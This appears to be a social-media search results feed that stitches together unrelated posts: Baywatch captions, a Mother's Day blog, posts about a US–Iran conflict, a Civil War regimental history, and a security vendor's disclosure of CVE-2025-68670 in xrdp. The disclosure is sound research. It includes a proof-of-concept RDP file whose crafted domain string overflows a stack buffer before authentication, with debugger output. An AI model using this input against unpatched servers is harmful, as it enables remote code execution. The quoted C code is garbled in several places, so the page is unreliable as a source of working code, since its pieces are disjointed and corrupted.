Search
1000 results for “message_in_a_bottle”
-
Season 1 Episode 5 "Message in a Bottle"
#RandomBaywatch #lvdlpx #Baywatch #BaywatchBabes #Exercise #BaywatchBabe #Lifeguards #morning #workout #montage #MorningWorkout #WorkoutMontage #Beach #MorningBeauty #BaywatchBoobs #Beach #Running #BeachRunning #Sexy #Boobs #Headlights #HighBeams #MessageinaBottle
-
#MichaelNewman #ErikaEleniak #ShawnWeatherly
Season 1 Episode 5 "Message in a Bottle"
#RandomBaywatch #lvdlpx #Baywatch #BaywatchBabes #Exercise #BaywatchBabe #Lifeguards #morning #workout #montage #MorningWorkout #WorkoutMontage #Beach #MorningBeauty #MessageinaBottle
-
#MichaelNewman #ErikaEleniak #ShawnWeatherly
Season 1 Episode 5 "Message in a Bottle"
#RandomBaywatch #lvdlpx #Baywatch #BaywatchBabes #Exercise #BaywatchBabe #Lifeguards #morning #workout #montage #MorningWorkout #WorkoutMontage #Beach #MorningBeauty #MessageinaBottle
-
#MichaelNewman #ShawnWeatherly #ErikaEleniak
Season 1 Episode 5 "Message in a Bottle"
#RandomBaywatch #lvdlpx #Baywatch #Rannavalve #90s #The90s #swimsuit #swimwear #beach #MorningWorkout #Rowing #Exercise #Fitness #Lifeguards #MessageInABottle
-
#MichaelNewman #ShawnWeatherly #ErikaEleniak
Season 1 Episode 5 "Message in a Bottle"
#RandomBaywatch #lvdlpx #Baywatch #Rannavalve #90s #The90s #swimsuit #swimwear #beach #MorningWorkout #Rowing #Exercise #Fitness #Lifeguards #MessageInABottle
-
Season 1 Episode 5 "Message in a Bottle"
#RandomBaywatch #lvdlpx #Baywatch #BaywatchBabes #Exercise #Muscle #Lifeguards #morning #workout #montage #MorningWorkout #WorkoutMontage #Beach #MorningBeauty #BaywatchBoobs #Beach #Fitness #Stretching #Sexy #Boobs #Headlights #MessageinaBottle
-
Season 1 Episode 5 "Message in a Bottle"
#RandomBaywatch #lvdlpx #Baywatch #BaywatchBabes #Exercise #Muscle #Lifeguards #morning #workout #montage #MorningWorkout #WorkoutMontage #Beach #MorningBeauty #BaywatchBoobs #Beach #Fitness #Stretching #Sexy #Boobs #Headlights #MessageinaBottle
-
Season 1 Episode 5 "Message in a Bottle"
#RandomBaywatch #lvdlpx #Baywatch #Rannavalve #90s #The90s #swimsuit #swimwear #beach #MorningWorkout #Rowing #Exercise #Fitness #Lifeguards #MessageInABottle
-
Season 1 Episode 5 "Message in a Bottle"
#RandomBaywatch #lvdlpx #Baywatch #Rannavalve #90s #The90s #swimsuit #swimwear #beach #MorningWorkout #Rowing #Exercise #Fitness #Lifeguards #MessageInABottle
-
Season 1 Episode 5 "Message in a Bottle"
#RandomBaywatch #lvdlpx #Baywatch #Rannavalve #90s #The90s #swimsuit #swimwear #beach #MorningWorkout #Rowing #Exercise #Fitness #Lifeguards #MessageInABottle
-
Season 1 Episode 5 "Message in a Bottle"
#RandomBaywatch #lvdlpx #Baywatch #Rannavalve #90s #The90s #swimsuit #swimwear #beach #MorningWorkout #Rowing #Exercise #Fitness #Lifeguards #MessageInABottle
-
Season 1 Episode 5 "Message in a Bottle"
#RandomBaywatch #lvdlpx #Baywatch #Rannavalve #90s #The90s #swimsuit #swimwear #beach #MorningWorkout #Rowing #Exercise #Fitness #Lifeguards #MessageInABottle
-
An Interesting Day
Yesterday was quite an interesting day. It started as my normal Saturday writing the Just A Thought, Miscellaneous Minds, and Movie Reviews. That were pretty much prepped through the week. But, I noticed my baby boy, Bobby Leach II, left a message—I kind on panicked because when that kid reaches out—it’s like the Day the Earth Stood Still—in jest, we call him the “Invisible Man” because he’s like a rarity that one very seldom sees. He left me a message that said, “Good morning Mom, just called to tell you I love you, and hope you’re having a wonderful weekend.” I called him up—we had a long conversation and he ended with…I’ve come to the conclusion that God has it all so we just need to do what’s right, look out for each other—everybody’s not on the same level and you can’t judge where they are—just help them when and if you can and keep it moving.”
This conversation started me on the trek of calling the rest of the crew, then I called Tanisha, my baby girl…opening with “Is the world coming to an end?” She asked why? I said, “your brother just called me—he never does that!” She said, “I know, we had a long conversation yesterday.” We discussed our plans for today and decided cooking was not part of the program.
The next call…Joi, who I call my logistics person. She’s always exploring new restaurants and places to eat. So, I immediately asked her what were the plans for tomorrow. She was talking about something was brewing with her friend Jackie, because her mom was in town, but there was nothing carved in stone. I told her I’d like to do something with our crew — last minute would be hard to find any reservations at all if possible—but like Sherlock Holmes, she was on the case.
I then called my oldest son, Andre’, who was on his way to the gym to workout. He’s our neighborhood health buff. When you see him, he’s a towering giant with a heart of gold. We talked for a brief moment. I told him I couldn’t wait until my new license plate came. He said, “Mom, I can’t believe how excited you are over a license plate.”
In the interim, my Goddaughter, Christina, was calling to see what I was doing because she wanted to come by. I told her was thinking about starting to paint the trim but hadn’t started yet. By the time she showed up, I was sitting in my easy chair with my feet up. Christina showed up at the door with the most beautiful bouquet of what looked to be like velvet flowers. She grabbed a cold bottle of water out of the fridge and we hung out watching one of my favorite Asian films…
Somehow that painting project got placed on hold. But I had a great day. Perhaps you are thinking all she did was talk to her kids. That may be true. But the point of this post is … Communication is key…My kid’s ages range from 40 to 54. I am so thankful to God, first of all, because they are still here, secondly, they’re never too busy for momma, and God is bringing healing and restoration in places in this family’s relationship that I prayed for.
So, on this Mother’s Day, I am so grateful for my crew. I feel like Stitch, “This is my family, it’s small and broken, but still good.” We must learn to love each other flaws and all. Happy Mother’s Day to my Mom—all my daughter’s, all the mothers at Peace Progressive MB, and my loyal readers. May your day be Merry and Bright! Blessings and Peace!
© Rhema International 2026. Unauthorized use and/or duplication of this material without express and written permission from this blog’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Rhema Internation
#ChristianBlogger #ChristianBlogs #MotherSDay #AnInterestingDay #Andre #Believer #Bible #Blogging #BobbyLeachII #Christ #Christian #Christianity #Christine #faith #Family #fiction #God #Jesus #Joi #Life #love #Tanisha #Writing -
Yesterday I learned - from the friend who took me to #Golestan Palace 15 years ago - about the importance of the Battle of #Karbala (680CE) in #Shia Islam, how it is still celebrated every year, and how #Arbaeen has been largest gathering of humanity on the planet at ~20m.
The key message, so deeply ingrained in that culture, is that:
> Humiliation at the hands of a tyrant (aka total surrender) is worse than death.
I fear Israel is manipulating the US into committing genocide in #Iran
-
Middle East conflict is coming to a head: US preparations against Iran intensified
According to the Financial Times, Western security circles are expecting a significantly more extensive conflict than the previous “12 Day War”. Command and control aircraft from a Joint Command Center have already arrived in Jordan. The country could become the “central US base of operations” in the event of war.
Iran explicitly warned several neighboring states: Any support from the USA or Israel in attacks on Iranian targets would make these countries legitimate targets.
The IRGC air force commander sent a direct message to Donald Trump: “We will answer you on the battlefield.”
The “Houthis” are also threatening to expand the conflict: If the US attacks Iran, “American ships” would be attacked.
#USA
#MiddleEast #US #Iran #WarOnIran #Jordan #RGC #tRump #Yemen #Israel #RegimeChange #USpol #EpsteinWar -
USS Laurel Hill, May 26, 1862 (Baldwin Lithograph, Collection of President Franklin D. Roosevelt, Hyde Park, New York, 1936, U.S. Naval Heritage Command, public domain).
Barely out of sight of the city of Alexandria, in Rapides Parish Louisiana, when it ran into the enemy during its retreat south in mid-May 1864, the Union’s Army of the Gulf easily defeated the Confederate States Army troops it encountered and continued its trek toward the village of Marksville in Avoyelles Parish. Members of the 47th Pennsylvania Volunteer Infantry, which was positioned farther back in the Union column, were aware of, but not involved in, that short engagement. According to C Company Musician Henry D. Wharton:
After marching a few miles skirmishing commenced in front between the cavalry and the enemy in riflepits [sic] on the bank of the river, but they were easily driven away. When we came up we discovered their pits and places where there had been batteries planted. At this point the John Warren, an unarmed transport, on which were sick soldiers and women, was fired into and sunk, killing many and those that were not drowned taken prisoners. A tin-clad gunboat was destroyed at the same place, by which we lost a large mail. Many letters and directed envelopes were found on the bank – thrown there after the contents had been read by the unprincipled scoundrels. The inhumanity of Guerrilla bands in this department is beyond belief, and if one did not know the truth of it or saw some of their barbarities, he would write it down as the story of a ‘reliable gentleman’ or as told by an ‘intelligent contraband.’ Not satisfied with his murderous intent on unarmed transports he fires into the Hospital steamer Laurel Hill, with four hundred sick on board. This boat had the usual hospital signal floating fore and aft, yet, notwithstanding all this, and the customs of war, they fired on them, proving by this act that they are more hardened than the Indians on the frontier.
* Note: The USS Laurel Hill survived the attack and, in a few short weeks, became the final home for ailing 47th Pennsylvania Volunteers, including Corporal William Schweitzer and Privates Amandus Bellis and Nicholas Hoffman (Company A) and Private John Witz (Company E).
Map of key 1864 Red River Campaign locations, showing the battle sites of Sabine Cross Roads, Pleasant Hill and Mansura in relation to the Union’s occupation sites at Alexandria, Grand Ecore, Morganza, and New Orleans (excerpt from Dickinson College/U.S. Library of Congress map, public domain; click to enlarge).
Resuming their trek south with the retreating Army of the Gulf, the 47th Pennsylvania Volunteers engaged in yet another long march, trudging more than thirty miles as the month of May 1864 wore on. According to the expedition’s commanding officer, Union Major-General Nathaniel P. Banks:
The fleet passed below Alexandria on the 13th of May. The army on its march from Alexandria did not encounter the enemy in force until near the town of Mansura. He was driven through the town in the evening of the 14th of May, and at daybreak next morning our advance encountered his cavalry on the prairie east of the town.
According to Henry Wharton, “On Sunday, May 15, we left the river road and took a short route through the woods, saving considerable distance.”
The windings of Red river are so numerous that it resembles the tape-worm railroad wherewith the politicians frightened the dear people during the administration of Ritner and Stevens. – We stopped several hours in the woods to leave cavalry pass, when we moved forward and by four o’clock emerged into a large open plain where we formed in line of battle, expecting a regular engagement. The enemy, however, retired and we advanced ‘till dark, when the forces halted for the night, with orders to rest on their arms. – ‘Twas here that Banks rode through our regiment, amidst the cheers of the boys, and gave the pleasant news that Grant had defeated Lee.
“Sleeping on Their Arms” by Winslow Homer (Harper’s Weekly, May 21, 1864).
Positioned just outside of the town of Marksville, under orders to “rest on their arms” for the night, the 47th Pennsylvanians half-dozed with their rifles within a finger’s length—but without the benefit of tents for cover. It was the eve of the Battle of Mansura, which unfolded on May 16, 1864 as follows, according to Wharton:
Early next morning we marched through Marksville into a prairie nine miles long and six wide where every preparation was made for a fight. The whole of our force was formed in line, in support of artillery in front, who commenced operations on the enemy driving him gradually from the prairie into the woods. As the enemy retreated before the heavy fire of our artillery, the infantry advanced in line until they reached Mousoula [sic, Mansura], where they formed in column, taking the whole field in an attempt to flank the enemy, but their running qualities were so good that we were foiled. The maneuvring [sic, maneuvering] of the troops was handsomely done, and the movements was [sic, were] one of the finest things of the war. The fight of artillery was a steady one of five miles. The enemy merely stood that they might cover the retreat of their infantry and train under cover of their artillery.
Per Major-General Banks, the Confederate troops “fell back, with steady and sharp skirmishing across the prairie, to a belt of woods, which he occupied.”
The enemy’s position covered three roads diverging from Mansura to the Atchafalaya. He manifested a determination here to obstinately resist our passage. The engagement, which lasted several hours, was confined chiefly to the artillery until our troops got possession of the edge of the woods – first upon our left by General Emory; subsequently on our right by General Smith, when he was driven from the field, after a sharp and decisive fight, with considerable loss.
According to military historian Steven E. Clay, “As the Army of the Gulf marched from Alexandria to Simmesport, it followed the River Road. As it moved, Taylor’s cavalry harassed the column from all sides.”
Steele’s men resumed the pressure on A. J. Smith’s rearguard. Annoying Emory and the cavalry advanced guard was Major and Bagby’s commands. The troops also attempted to slow the Federal march by cutting trees and placing other obstacles in the way. Parson’s men skirmished with Gooding’s troopers on the right flank. None of the rebel cavalry’s efforts, however, appreciably slowed the Union column.
On 14 May, the army’s van arrived at Bayour Choctaw. Emory called the pontoon train forward, and within a short time, the pontonniers had the stream bridged and the army was crossing…. That evening the troops of the XIX Corps [including the 47th Pennsylvania Volunteers] bivouacked beside the wrecks of the John Warner, Signal, and Covington. Strewn upon the ground were the letters many of the men had mailed to their loved ones earlier and had been placed on the Warner bound for New Orleans. The rebel soldiers had opened the letters, read them for entertainment, and simply tossed them aside. The idea did not sit well with the Federals, but neither did the wanton destruction and plunder of civilian homes with the Confederates.
On 15 May the column slowly crossed the Bayou Choctaw Swamp and entered the Avoyelles … Prairie. There, Major’s cavalry, later along with Bagby’s troops, attacked the lead elements several times. The fighting became so hot at moments that Emory deployed his artillery to help drive the bothersome rebel troopers away…. By nightfall … the XIX Corps had reached Marksville with the rest of the army strung out behind.
Late on 15 May, Banks learned that Taylor had massed his forces six miles ahead at the town of Mansura, evidently with the intention of blocking further Federal movement on the road to Simmesport…. On learning of the concentration of rebel forces, Banks sent orders to Emory directing him to move no later than 0300 [3 a.m.] on 16 May and to attack the enemy at daybreak. Further, Smith advanced on Emory’s right to attack into Taylor’s left flank. The XIII Corps [13th Corps], now under Lawler since 9 May … was to remain in front of Marksville as the reserve. The trains [Union wagon trains] were held behind that town….
As ordered, the Army of the Gulf moved south before sunrise. As morning dawned, the Federal army began its deployment on the wide open plain of the Avoyelles Prairie. The US troops advanced with Emory’s XIX [including the 47th Pennsylvania] in the lead with Grover’s 1st Division on the Federal left near the Grand River and McMillan’s 2nd Division [including the 47th Pennsylvania] on the right. The XIX Corps was followed by A. J. Smith’s XVI Corps [16th Corps] in column; Mower’s division was followed by that of Kilby Smith. As the Federal brigades deployed on the field they could see the Confederate battle line in the distance. Virtually in the center of the battlefield was the tiny village of Mansura.
According to Clay, Confederate Major-General Richard Taylor (a plantation owner and son of former U.S. President Zachary Taylor) “had placed eight dismounted cavalry regiments from Major’s and Bagby’s commands to the east of the hamlet” of Mansura. “At least 19 cannon with the batteries interspersed among the brigades supported these troops.” Confederate Brigadier-General Camille Armand Jules Marie, the Prince de Polignac, a prince of France who fought with the Confederate Army during America’s Civil War and whom the 47th Pennsylvanian Volunteers had previously faced in combat during the Battle of Sabine Cross Roads near Mansfield, Louisiana, “posted his two small infantry brigades and two dismounted regiments of cavalry on the left, west of town, and thirteen more guns supported Polignac’s force.”
New York Tribune headline announcing the U.S. Army of the Gulf’s May 1864 victory near Marksville, Louisiana (New York Tribune, June 3, 1864, public domain).
Standing “on a flat, green savanna,” according to Clay, the troops under Brigadier-General Emory’s command, including the 47th Pennsylvania Volunteers, were the first to march into the battle’s fray, followed by A. J. Smith’s “divisions to the right of the line.” It quickly became obvious to all who were watching the scene unfold that Taylor had woefully misjudged his opponents; his six thousand Confederates were greeted with the spectacle of the eighteen-thousand strong Army of the Gulf arrayed before them.
According to Clay, “The battle began sometime after 0600 [6 a.m.] with a mutual artillery bombardment.”
As the fusillade opened, commanders on both sides ordered their men to lie down in order to reduce casualties during the artillery duel. The tactic was effective. The barrage lasted about four hours, but few men were struck by the many rounds fired. As the Union battle line rose and moved forward on occasion, Taylor’s skirmish line responded by slowly giving ground…. Finally, at about 1000 (1 p.m.), as the XVI Corps pressed forward on the Confederate left to flank Taylor’s position as planned, the rebel line quickly sidestepped the move and fell back toward their trains which were located southwest in the village of Evergreen.
Unlike the sanguinary opening battles of the Red River Campaign, the Battle of Mansura was far less brutal. Per Wharton:
Our loss was slight. Of the rebels we could not ascertain correctly, but learned from citizens who had secreted themselves during the fight, that they had many killed and wounded, who threw them into wagons, promiscuously, and drove them off so that we could not learn their casualties.
Afterward, the victorious Army of the Gulf resumed its march south. According Major-General Banks:
The 16th of May we reached Simmsport [sic, Simmesport], on the Atchafalaya. Being entirely destitute of any ordinary bridge material for the passage of this river – about six hundred yards wide – a bridge was constructed of the steamers, under direction of Lieutenant Colonel Bailey. This work was not of the same magnitude, but was as important to the army as the dam at Alexandria was to the navy. It had the merit of being an entirely novel construction, no bridge of such magnitude having been constructed of similar materials. The bridge was completed at one o’clock on the 19th of May. The wagon train passed in the afternoon, and the troops the next morning, in better spirit and condition, as able and eager to meet the enemy as at any period of the campaign.
Union Major-General Nathaniel Banks subsequently reported that, during the Army of the Gulf’s final engagement with Confederates, the “command of General A. J. Smith, which covered the rear of the army during the construction of the bridge and the passage of the army, had a severe engagement with the enemy, under Polignac, on the afternoon of the 19th, at Yellow Bayou, which lasted several hours.”
Our loss was about one hundred and fifty in killed and wounded; that of the enemy much greater, besides many prisoners who were taken by our troops. Major General E. R. S. Canby arrived at Simmsport [sic, Simmesport] on the 19th of May, and the next day assumed command of the troops as a portion of the forces of the military division of the West Mississippi, to the command of which he had been assigned.
The 47th Pennsylvania, however, was not involved in that battle at Yellow Bayou; according to Wharton:
This fight was the last one of the expedition. The whole of the force is safe on the Mississippi, gunboats, transports and trains. The 16th and 17th have gone to their old commands.
It is amusing to read the statements of correspondents to papers North, concerning our movements and the losses of our army. I have it from the best source that the Federal loss from Franklin to Mansfield, and from their [sic] to this point does not exceed thirty-five hundred in killed, wounded and missing, while that of the rebels is over eight thousand.
Union Army base at Morganza Bend, Louisiana, circa 1863-1865 (U.S. Library of Congress, public domain).
After that final battle, the surviving members of the 47th made their way through Simmesport and into the Atchafalaya Basin, and then moved on to the village of Morganza, where they made camp again. According to Wharton, the members of Company C were sent on a special mission which took them on an intense journey of one hundred and twenty miles:
Company C, on last Saturday was detailed by the General in command of the Division to take one hundred and eighty-seven prisoners (rebs) to New Orleans. This they done [sic] satisfactorily and returned yesterday to their regiment, ready for duty. While in the City some of the boys made Captain Gobin quite a handsome present, to show their appreciation of him as an officer gentleman.
By May 28, 1864, the men from Company C had returned from New Orleans and were once again encamped at Morganza with the full 47th Pennsylvania Volunteer Infantry, prompting Henry Wharton to write:
The boys are well. James Kennedy who was wounded at Pleasant Hill, died at New Orleans hospital a few days ago. His friends in the company were pleased to learn that Dr. Dodge of Sunbury, now of the U.S. Steamer Octorora, was with him in his last moments, and ministered to his wants. The Doctor was one of the Surgeons from the Navy who volunteered when our wounded was [sic, were] sent to New Orleans.
Their long trek through Louisiana was over, but their fight to preserve America’s Union was not.
Sources:
- Banks, Nathaniel P. “Report of the Red River Campaign,” in “Annual Report of the Secretary of War,” in Message of the President of the United States, and Accompanying Documents, to the Two Houses of Congress, at the Commencement of the First Session of the Thirty-Ninth Congress. Washington: Government Printing Office, 1866.
- Bates, Samuel P. History of Pennsylvania Volunteers, 1861-5, vol. 1. Harrisburg, Pennsylvania: B. Singerly, State Printer, 1869.
- “Battle of Pleasant Hill, April 9, 1864, Walker’s Texas Division Campaign Map, Detail,” in “House Divided.” Carlisle, Pennsylvania: History Department, Dickinson College, November 21, 2009 (cropped from the original public domain map available on the website of the U.S. Library of Congress).
- Clay, Steven E. The Staff Ride Handbook for the Red River Campaign, 7 March-19 May 1864. Fort Leavenworth, Kansas: Combat Studies Institute Press, U.S. Army Combined Arms Centers, 2023.
- Prisoner of War Records, Camp Ford and Camp Groce (47th Pennsylvania Volunteer Infantry). Tyler Texas: Smith County Historical Society, 2010.
- “Report of Maj. Gen. Nathaniel P. Banks, U. S. Army, Commanding Expedition and Department of the Gulf” (to Edwin M. Stanton, Secretary of War), in Annual Report of the Secretary of War, in Message of the President of the United States, and Accompanying Documents, to the Two Houses of Congress, at the Commencement of the First Session of the Thirty-Ninth Congress. Washington, D.C.: Government Printing Office, 1866.
- Schmidt, Lewis G. A Civil War History of the 47th Regiment of Pennsylvania Veteran Volunteers. Allentown, Pennsylvania: Self-published, 1986.
- “The History of the Forty-Seventh Regt. P. V.” Allentown, Pennsylvania: The Lehigh Register, July 20, 1870.
- Wharton, Henry D. Letters from the Sunbury Guards, 1861-1868. Sunbury, Pennsylvania: Sunbury American.
#003366 #1864 #47thPennsylvaniaInfantry #47thPennsylvaniaVolunteers #Alexandria #America #AmericanCivilWar #AmericanHistory #Army #ArmyOfTheGulf #Atchafalaya #AvoyellesParish #BattleOfMansura #CivilWar #CommonwealthOfPennsylvania #Emory #History #Infantry #LaurelHill #Louisiana #Mansura #Marksville #Morganza #NathanielPBanks #PennsylvaniaHistory #PennsylvaniaInTheCivilWar #RapidesParish #RedRiver #RedRiverCampaign #Simmesport #Slavery #TheUnionArmy #USMilitaryAndTheUnionArmy #USSLaurelHill #WilliamHEmory #XIXCorps
-
Message in a bottle – Mural by WD (Wild Drawing) in Morlaix, France for MX ARTS TOUR
Street artist WD (Wild Drawing) By WD (Wild Drawing) in Morlaix, France for MX ARTS TOUR. Wild Drawing: Message in a bottle, Morlaix France 2022. Today, more and more people are trapped and alone in their bottled world… no one listens to their desperate efforts for communication, help and humanity. My latest mural for MX ARTS TOUR festival 2022, big thanks to ZAG and the whole team, you guys rock. -
CVE-2025-68670: discovering an RCE vulnerability in xrdp
In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session – all while maintaining connection security.
We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.
Client data transmission via RDP
Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:
{
[..SNIP..]
char username[INFO_CLIENT_MAX_CB_LEN];
char password[INFO_CLIENT_MAX_CB_LEN];
char domain[INFO_CLIENT_MAX_CB_LEN];
char program[INFO_CLIENT_MAX_CB_LEN];
char directory[INFO_CLIENT_MAX_CB_LEN];
[..SNIP..]
}
The value of the INFO_CLIENT_MAX_CB_LEN constant corresponds to the maximum string length and is defined as follows:
#define INFO_CLIENT_MAX_CB_LEN 512
When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server converts the data to UTF-8 before saving it.
if (ts_info_utf16_in( //
[1] s, len_domain, self->rdp_layer->client_info.domain, sizeof(self->rdp_layer->client_info.domain)) != 0) //
[2]{
[..SNIP..]
}
The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].
static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)
{
int rv = 0;
LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d", src_bytes, dst_len);
if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in"))
{
rv = 1;
}
else
{
int term;
int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2,
dst, dst_len);
if (num_chars > dst_len) //
[3] {
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow"); rv = 1;
}
/ / String should be null-terminated. We haven't read the terminator yet
in_uint16_le(s, term);
if (term != 0)
{
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: bad terminator. Expected 0, got %d", term);
rv = 1;
}
}
return rv;
}
Next, the in_utf16_le_fixed_as_utf8_proc function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].
{
unsigned int rv = 0;
char32_t c32;
char u8str[MAXLEN_UTF8_CHAR];
unsigned int u8len;
char *saved_s_end = s->end;// Expansion of S_CHECK_REM(s, n*2) using passed-in file and line #ifdef USE_DEVEL_STREAMCHECK
parser_stream_overflow_check(s, n * 2, 0, file, line); #endif
// Temporarily set the stream end pointer to allow us to use
// s_check_rem() when reading in UTF-16 words
if (s->end - s->p > (int)(n * 2))
{
s->end = s->p + (int)(n * 2);
}while (s_check_rem(s, 2))
{
c32 = get_c32_from_stream(s);
u8len = utf_char32_to_utf8(c32, u8str);
if (u8len + 1 <= vn) //
[4] {
/* Room for this character and a terminator. Add the character */
unsigned int i;
for (i = 0 ; i < u8len ; ++i)
{
v[i] = u8str[i];
}v n -= u8len;
v += u8len;
}else if (vn > 1)
{
/* We've skipped a character, but there's more than one byte
* remaining in the output buffer. Mark the output buffer as
* full so we don't get a smaller character being squeezed into
* the remaining space */
vn = 1;
}r v += u8len;
}
// Restore stream to full length s->end = saved_s_end;
if (vn > 0)
{
*v = '\0'; //
[5] }
+ +rv;
return rv;
}
Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.CVE-2025-68670: an RCE vulnerability in xrdp
The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.
x rdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
xrdp_login_wnd_create(struct xrdp_wm *self)
xrdp_wm_init(struct xrdp_wm *self)
xrdp_wm_login_state_changed(struct xrdp_wm *self)
xrdp_wm_check_wait_objs(struct xrdp_wm *self)
xrdp_process_main_loop(struct xrdp_process *self)
The code snippet where the vulnerable function is called looks like this:
char resultIP[256]; //
[7][..SNIP..]
combo->item_index = xrdp_wm_parse_domain_information(
self->session->client_info->domain, //
[6] combo->data_list->count, 1,
resultIP /* just a dummy place holder, we ignore
*/ );
As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let’s look at exactly what the vulnerable function does with these arguments.
static int
xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
{
int ret;
int pos;
int comboxindex;
char index[2];/* If the first char in the domain name is '_' we use the domain name as IP*/
ret = 0; /* default return value */
/* resultBuffer assumed to be 256 chars */
g_memset(resultBuffer, 0, 256);
if (originalDomainInfo[0] == '_') //
[8] {
/* we try to locate a number indicating what combobox index the user
* prefer the information is loaded from domain field, from the client
* We must use valid chars in the domain name.
* Underscore is a valid name in the domain.
* Invalid chars are ignored in microsoft client therefore we use '_'
* again. this sec '__' contains the split for index.*/
pos = g_pos(&originalDomainInfo[1], "__"); //
[9] if (pos > 0)
{
/* an index is found we try to use it */
LOG(LOG_LEVEL_DEBUG, "domain contains index char __");
if (decode)
{
[..SNIP..]
}
/ * pos limit the String to only contain the IP */
g_strncpy(resultBuffer, &originalDomainInfo[1], pos); //
[10] }
else
{
LOG(LOG_LEVEL_DEBUG, "domain does not contain _");
g_strncpy(resultBuffer, &originalDomainInfo[1], 255);
}
}
return ret;
}
As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain name – starting from the second character and ending with the double underscore (“__”) – is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if it’s technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker’s intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial “_” and the subsequent “__”. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.
PoC
As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server’s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string “AAAAAAAA”. The contents of the RDP file are shown below:
alternate full address:s:172.22.118.7
full address:s:172.22.118.7
domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0
username:s:testuser
When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.
gef➤ bt
#0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44
#1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78
#2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at./nptl/pthread_kill.c:89
#3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
#4 0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79
#5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156
#6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26
#7 0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24
#8 0x000063654a2e5ad5 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x00007adb00000a00 in ?? ()
#11 0x0000000000050004 in ?? ()
#12 0x00007fff91732220 in ?? ()
#13 0x000000000000030a in ?? ()
#14 0xfffffffffffffff8 in ?? ()
#15 0x000000052dc71740 in ?? ()
#16 0x3030305f70647278 in ?? ()
#17 0x616d5f6130333030 in ?? ()
#18 0x00636e79735f6e69 in ?? ()
#19 0x0000000000000000 in ?? ()Protection against vulnerability exploitation
